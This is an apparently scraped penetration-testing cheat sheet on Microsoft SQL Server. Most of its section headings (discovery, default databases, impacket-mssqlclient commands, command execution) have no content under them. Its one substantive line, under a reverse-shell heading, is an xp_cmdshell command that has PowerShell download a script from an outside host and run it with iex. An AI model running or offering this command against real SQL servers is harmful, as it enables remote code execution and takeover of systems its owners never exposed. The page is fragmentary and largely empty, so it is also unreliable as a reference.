SQL Server
Microsoft SQL Server
# Discovery
# Default Databases:
# impacket-mssqlclient command cheatsheet
# Command Execution

Last updated
Microsoft SQL Server

Last updated
# Reverse Shell using impacket-mssqlclient [Observe the escape of quotes]
xp_cmdshell powershell iex(New-Object Net.WebClient).DownloadString(\"http://10.10.14.18:8000/ivs.ps1\")